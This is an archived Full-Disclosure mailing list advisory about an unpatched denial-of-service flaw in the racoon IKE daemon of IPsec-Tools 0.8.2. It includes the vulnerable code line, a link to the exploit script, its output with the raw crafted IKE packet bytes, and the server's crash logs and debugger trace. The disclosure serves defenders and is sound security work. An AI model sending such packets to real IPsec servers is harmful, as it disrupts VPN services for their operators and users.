lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 19 May 2015 13:32:20 -0700 (PDT)
From: Javantea <jvoss@...sci.com>
To: fulldisclosure@...lists.org
Subject: [FD] 0-day Denial of Service in IPsec-Tools

Denial of Service in IPsec-Tools
Vulnerability Report
May 19, 2015

Product:  IPsec-Tools
Version: 0.8.2
Website:  http://ipsec-tools.sourceforge.net/
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

IPsec-Tools is vulnerable to a 0-day exploit that I made available yesterday. It is a null dereference crash in racoon in gssapi.c. It requires HAVE_GSSAPI to be set, which is a configuration option. The impact is a denial of service against the IKE daemon. Because IPsec is critical infrastructure and this attack requires two UDP packets, it deserves a medium rating. This denial of service violates the premise that IPsec's security is built upon. More information about the impact can be found on my website linked below.

If you're running IPsec-Tools, replace it sensibly as soon as possible. The reason this exploit is being released without patch on full disclosure is because the authors have apparently abandoned the software.

The vulnerability:

racoon/gssapi.c:205:static int gssapi_init(struct ph1handle *iph1)

	if (iph1->rmconf->proposal->gssid != NULL) {

The exploit is available on my website:
https://www.altsci.com/ipsec/ipsec-tools-sa.html

Example Usage:
python3 repro_racoon_dos129.py
Warning: Unable to bind to port 500. Might not work. [Errno 13] Permission denied
Umm, okay.
129 ('\x81\xcf{r\x8e\xb6a\xdd9\xf1\x87cP\xb1\x05\xc7\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x98\r\x00\x00<\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x000\x01\x01\x00\x01\x00\x00\x00(\x01\x01\x00\x00\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x01Q\x80\x80\x01\x00\x07\x80\x0e\x01\x00\x80\x03\x00\x03\x80\x02\x00\x02\x80\x04\x00\x05\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\x00\x00\x00\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00', ('192.168.88.247', 500))
129 sending second packet
Umm, okay.

What it looks like on the server:

sudo racoon -F -v -f server_racoon.conf >server_dos5m.txt 2>&1 &

jvoss@...ecu:~$ dmesg |tail
[  584.440533] AVX or AES-NI instructions are not detected.
[  584.442253] AVX or AES-NI instructions are not detected.
[  584.490468] AVX instructions are not detected.
[13683.867215] init: upstart-udev-bridge main process (361) terminated with status 1
[13683.867223] init: upstart-udev-bridge main process ended, respawning
[13683.867307] init: upstart-file-bridge main process (452) terminated with status 1
[13683.867313] init: upstart-file-bridge main process ended, respawning
[13683.867386] init: upstart-socket-bridge main process (616) terminated with status 1
[13683.867392] init: upstart-socket-bridge main process ended, respawning
[19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000]

Messages printed by the daemon:
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
2015-04-27 15:22:14: [169.254.44.43] ERROR: ignore the packet, received unexpecting payload type 128.
2015-04-27 15:22:14: INFO: respond new phase 1 negotiation: 169.254.88.251[500]<=>169.254.44.43[42258]
2015-04-27 15:22:14: INFO: begin Identity Protection mode.
2015-04-27 15:22:14: INFO: received Vendor ID: RFC 3947
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02

2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947

Stack trace and related debugging information (apologies for the lack of symbols):
Program received signal SIGSEGV, Segmentation fault.
0x000055555557ace7 in ?? ()
(gdb) bt
#0  0x000055555557ace7 in ?? ()
#1  0x000055555557b775 in ?? ()
#2  0x000055555556c1a1 in ?? ()
#3  0x0000555555563fd1 in ?? ()
#4  0x00005555555658ec in ?? ()
#5  0x000055555555fc9d in ?? ()
#6  0x000055555555f273 in ?? ()
#7  0x00007ffff6953ec5 in __libc_start_main (main=0x55555555f010, argc=5, argv=0x7fffffffe738, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe728) at libc-start.c:287
#8  0x000055555555f3ec in ?? ()

(gdb) x/15i $rip - 12
   0x55555557acdb:      mov    %eax,0x1c8(%rsp)
   0x55555557ace2:      mov    0x28(%r12),%rax
=> 0x55555557ace7:      mov    0x100(%rax),%rax
   0x55555557acee:      mov    0x30(%rax),%rax
   0x55555557acf2:      test   %rax,%rax
   0x55555557acf5:      je     0x55555557af00
   0x55555557acfb:      mov    (%rax),%rdx
   0x55555557acfe:      lea    0x20(%rsp),%r13
   0x55555557ad03:      mov    0x8(%rax),%rax
   0x55555557ad07:      lea    0x1c(%rsp),%rbx
   0x55555557ad0c:      lea    0x30(%rsp),%rsi
   0x55555557ad11:      mov    %r13,%rcx
   0x55555557ad14:      mov    %rdx,0x30(%rsp)
   0x55555557ad19:      mov    %rbx,%rdi
   0x55555557ad1c:      xor    %edx,%edx

(gdb) i r
rax            0x0      0
rbx            0x0      0
rcx            0x5555558dbe40   93824995933760
rdx            0x5555558dbe40   93824995933760
rsi            0x0      0
rdi            0x5555558dbdc0   93824995933632
rbp            0x5555558dbdc0   0x5555558dbdc0
rsp            0x7fffffffd180   0x7fffffffd180
r8             0x5555558dbdc0   93824995933632
r9             0x7ffff6cf07b8   140737334151096
r10            0xbdb00  776960
r11            0x5555558da301   93824995926785
r12            0x5555558da300   93824995926784
r13            0x555555822460   93824995173472
r14            0x5555558da420   93824995927072
r15            0x7fffffffd260   140737488343648
rip            0x55555557ace7   0x55555557ace7
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0


Tested platforms:
Ubuntu
Gentoo (USE flag kerberos)

This vulnerability affects many platforms (NetBSD and FreeBSD for example), but I did not have time to test them. If your system is running IPsec-Tools and you are not sure whether it is vulnerable, please test it.

Disclosure Timeline:
Found:              Nov 2013
Reported to author: Dec 2013
Reported to author: May 2015
Full Disclosure:    Mon, May 18, 2015

If anyone has questions or comments about this or related topics, feel free to contact me.

Regards,
Javantea

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ